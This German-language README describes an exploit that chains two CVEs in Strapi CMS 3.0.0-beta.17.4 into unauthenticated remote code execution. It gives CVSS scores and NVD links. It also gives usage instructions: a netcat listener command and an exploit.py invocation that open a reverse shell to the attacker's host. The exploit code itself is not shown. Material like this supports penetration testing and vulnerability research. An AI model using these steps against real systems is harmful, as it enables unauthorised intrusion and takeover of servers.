
Strapi CMS 3.0.0-beta.17.4 - Nicht authentifizierte Remote-Codeausführung (CVE-2019-18818, CVE-2019-19609)
Dieser Exploit zielt auf zwei Schwachstellen im Strapi CMS Framework Version 3.0.0-beta-17.4 ab, die eine nicht authentifizierte Remotecodeausführung (RCE) ermöglichen.
Schwacher Mechanismus zur Wiederherstellung vergessener Passwörter
CVSS: 9.8 - Kritisch
Weitere Details: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
Unzureichende Neutralisierung spezieller Elemente in einem Betriebssystembefehl ('OS Command Injection')
CVSS: 7.2 - Hoch
Weitere Details: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
Bevor Sie diesen Exploit ausführen, starten Sie einen netcat-Listener auf dem lport, den Sie in den folgenden Optionen angeben.
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>